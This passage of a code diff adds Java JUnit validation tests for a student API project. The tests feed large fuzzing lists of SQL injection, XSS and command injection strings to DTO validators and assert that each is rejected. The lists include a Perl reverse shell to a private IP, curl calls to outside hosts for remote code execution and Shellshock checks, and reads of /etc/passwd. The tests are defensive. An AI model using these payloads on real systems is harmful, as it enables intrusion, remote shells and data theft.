"&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", 
"; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 
1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", 
+ "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for PacoteDTOSaveRequest") + public void testSecurityVulnerabilitiesForSave(String text) { + PacoteDTOSaveRequest response = new PacoteDTOSaveRequest(text, 2.0, text, true, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat 
/etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| 
dir C:\\Users", "; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 
1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", 
+ "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for PacoteDTOSaveRequest") + public void testSecurityVulnerabilitiesForPatch(String text) { + PacoteDTOPatchRequest response = new PacoteDTOPatchRequest(1L,text, 2.0, text, true, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + -124 + -35 + -1 + 501 + 502 + 56789 + 3214 + 63446 + """) + @DisplayName("Security Test for PacoteBasePrice") + public void testSecurityVulnerabilitiesForPacoteBasePrice(Double value) { + PacoteDTOSaveRequest response = new PacoteDTOSaveRequest("random name", value,"Random text", true, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + + @ParameterizedTest + @CsvSource(textBlock = + """ + -124 + -14 + -1 + -321 + -345 + -9999 + -3455 + """) + @DisplayName("Security Test for tipoPacote") + public void testSecurityVulnerabilitiesForTipoPacoteId(long tipoPacoteId) { + PacoteDTOSaveRequest response = new PacoteDTOSaveRequest("random name", 2.0,"Random text", true,tipoPacoteId); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + + + + +} \ No newline at end of file 
diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/ReviewDTOSTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/ReviewDTOSTest.java
new file mode 100644
index 00000000..0d7c3b56
--- /dev/null
+++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/ReviewDTOSTest.java
@@ -0,0 +1,801 @@ +package isep.ipp.pt.api.desofs.securityTests; + +import isep.ipp.pt.api.desofs.Dto.ReviewDTO.ControllerLayer.ReviewDTOPatchRequest; +import isep.ipp.pt.api.desofs.Dto.ReviewDTO.ControllerLayer.ReviewDTOSaveRequest; +import jakarta.validation.ConstraintViolation; +import jakarta.validation.Validation; +import jakarta.validation.Validator; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.DisplayName; +import org.junit.jupiter.params.ParameterizedTest; +import org.junit.jupiter.params.provider.CsvSource; +import org.springframework.boot.test.context.SpringBootTest; + +import java.util.Set; + +import static org.junit.jupiter.api.Assertions.*; +@SpringBootTest +class ReviewDTOSTest { + + private Validator validator; + @BeforeEach + void setUp() { + validator = Validation.buildDefaultValidatorFactory().getValidator(); + } + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + 
"'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", 
"; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use 